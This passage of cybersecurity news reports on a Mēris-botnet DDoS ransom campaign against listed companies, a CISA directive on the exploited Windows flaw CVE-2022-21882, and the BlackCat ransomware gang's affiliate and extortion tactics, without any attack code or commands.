According to Nelli Klepfish, a security analyst at Imperva, the company against which the DDoS assault was launched received multiple ransom notes during the attack. To prevent the loss of “hundreds of millions” in market cap and to remain online, the company paid the attackers in bitcoin.  
Imperva thwarted more than 12 million embedded requests targeting random pages of the firm’s site. The next day, the attackers sent over 15 million requests to the same site, however, this time the URL contained a different message. But the attackers employed similar methodology of threatening the company’s CEO for devastating consequences, such as the company’s stock price plummeting if they refuse to pay the ransom.  
The most devastating assault is said to have lasted less than a minute, in which researchers measured 2.5 million RPS (1.5Gbps of TCP traffic in terms of bandwidth) as the highest number of requests received.  
An identical attack was sustained by one of the sister sites operated by the same firm that lasted nearly 10 minutes, even as the attackers constantly changed their attack tactics and ransom notes to avert mitigation.  
Evidence gathered by Imperva points to the DDoS assaults originating from the Mēris botnet, which has exploited a now-patched security loophole in Mikrotik routers (CVE-2018-14847) to strike targets, including Yandex, a Russia-based technology and search engine giant last September.  
"The types of sites the threat actors are after appear to be business sites focusing on sales and communications," Klepfish said. "Targets tend to be U.S.- or Europe-based with the one thing they all have in common being that they are all exchange-listed companies and the threat actors use this to their advantage by referring to the potential damage a DDoS attack could do to the company stock price."  
Imperva unearthed about 34,815 sources of attack’s origin. In 20% of the cases Imperva discovered, the attackers launched 90 to 750 thousand RPS. Top attack sources attacks came from Indonesia, followed by the U.S., China, Brazil, India, Colombia, Russia, Thailand, Mexico, and Argentina.  
Imperva reported an interesting fact that the attackers are claiming to be members of REvil, the infamous ransomware-as-a-service cartel that suffered a major setback after a number of its operators were arrested by Russian law enforcement agencies earlier this January. However, the researchers yet to confirm that the claims are made by the original REvil operators or some imposter.

CISA Issues Warning to Federal Agencies Regarding Actively Exploited Windows Flaw


The US Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal agencies to address their systems against an actively exploited Windows vulnerability that allows malicious actors to abuse the Microsoft operating system and secure administrator privileges on a device. The vulnerability affects Windows 10, Windows 11, and Windows Server. 

In a CISA notice published February 4, all Federal Civilian Executive Branch Agencies (FCEB) agencies have two weeks to comply and address their systems to mitigate the threat from this actively exploited Windows vulnerability, tracked as CVE-2022-21882. 

Additionally, CISA recommended all private and public sector firms reduce their exposure to ongoing cyber assaults by adopting this Directive and prioritizing mitigation of vulnerabilities included in its catalog of actively exploited security flaws. 

"CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below," the cybersecurity agency said today. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose a significant risk to the federal enterprise."

According to Microsoft's advisory, the attackers with limited access to exploited devices can use the newly obtained user rights to spread laterally within the network, create new admin users, or execute privileged commands. 

"A local, authenticated attacker could gain elevated local system or administrator privileges through a vulnerability in the Win32k.sys driver," researchers explained. This vulnerability affects systems running Windows 7, Windows 8, Windows 10, and Windows 11 as well as Windows Server 2019 and 2022. The bug is also a bypass of another Windows Win32k privilege escalation bug (CVE-2021-1732), a zero-day flaw patched in February 2021 and actively exploited in attacks since at least the summer of 2020.

Security experts at BleepingComputer also examined an exploit targeting this bug and discovered no issues compiling the exploit and using it to open Notepad with SYSTEM privileges on a Windows 10 system (the exploit didn't work on Windows 11). 

In recent months, Windows patches have hit the headlines for the wrong reasons especially after Microsoft botched not one, but two zero-day patches. This led to security researcher Abdelhamid Naceri, who identified one of the failed patches, sarcastically warning users: “you better wait and see how Microsoft will screw the patch again.”

BlackCat Ransomware Gang Employing Novel Techniques to Target Organizations


Last year in December, malware researchers from Recorded Future and MalwareHunterTeam unearthed ALPHV (aka BlackCat), the first professional ransomware strain that was designed in the Rust programming language. In this post, we will explore some of the methodologies employed by ransomware developers to target organizations.

According to an analysis published last month by Varonis, BlackCat was observed recruiting operators from multiple ransomware organizations, offering to allow affiliates to leverage the ransomware and keep 80-90% of the ransom payment.

“The group’s leak site, active since early December 2021, has named over twenty victim organizations as of late January 2022, though the total number of victims, including those that have paid a ransom to avoid exposure, is likely greater,” Varonis’s Jason Hill explained. 

The attackers leveraging BlackCat, often referred to as the "BlackCat gang,” employ multiple tactics that are becoming increasingly commonplace in the ransomware space. Notably, they use several extortion techniques in some cases, including the siphoning of victim data before ransomware deployment, threats to release data if the ransom is not paid, and distributed denial-of-service (DDoS) attacks.

According to cybersecurity researchers at Recorded Future, the ALPHV/BlackCat developer was previously involved with the REvil ransomware gang. Last month, the Russian government disclosed that at the United States’ request it arrested 14 individuals in Russia linked to the REvil ransomware gang.

Still, REvil rolls on despite these actions, according to Paul Roberts at ReversingLabs. “The recent arrests have NOT led to a noticeable change in detections of REvil malicious files,” Roberts wrote. “In fact, detections of files and other software modules associated with the REvil ransomware increased modestly in the week following the arrests by Russia’s FSB intelligence service.” 

Meanwhile, the U.S. State Department has a standing $10 million reward for information leading to the identification or location of any individuals holding key leadership positions in REvil. 

As of December 2021, BlackCat has the seventh-largest number of victims listed on their leak site among ransomware groups tracked by Unit 42 researchers. While Conti (ranked second) has been around in various guises for almost two years, it is surrounded at the top of the chart by emerging families.